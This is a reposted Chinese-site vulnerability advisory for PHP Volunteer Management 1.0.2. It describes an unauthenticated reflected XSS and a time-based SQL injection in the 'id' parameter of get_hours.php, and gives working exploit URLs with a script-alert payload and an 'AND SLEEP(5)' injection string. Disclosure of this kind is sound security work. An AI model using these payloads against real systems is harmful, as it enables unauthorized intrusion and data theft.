来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 标题: PHP Volunteer Management #39;id#39; 1.0.2 Multiple Vulnerabilities作者: G13 www.2cto.com下载地址: https://sourceforge.net/projects/phpvolunteer/影响版本: 1.0.20x01 描述0x02 XS......
|
标题: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities
作者: G13 www.2cto.com 下载地址: https://sourceforge.net/projects/phpvolunteer/ 影响版本: 1.0.2 0x01 描述 0x02 XSS 0x03 SQL Injection 0x04 Vendor 报告 ##### 0x01概述 ##### This is a PHP Volunteer Management software. Keep track of Volunteer hours worked and location assignments. This system is built on PHP/MySql. ##### 0x02 XSS ##### ---------------缺陷------------------- The 'id' parameter on the get_hours.php page is vulnerable to XSS. No authentication is needed. This is a reflective XSS vulnerability. ----------测试----------------------------------- http://www.2cto.com /mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10 ------------利用--------------------------- http://www.2cto.com /mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10 ##### 0x03 SQL Injection ##### ---------------缺陷------------------- The 'id' parameter on the get_hours.php page is also vulnerable to SQL Injection. No authentication is needed. ----------测试----------------------------------- http://localhost/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10 ------------利用--------------------------- http://localhost/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10 修复: 相应过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
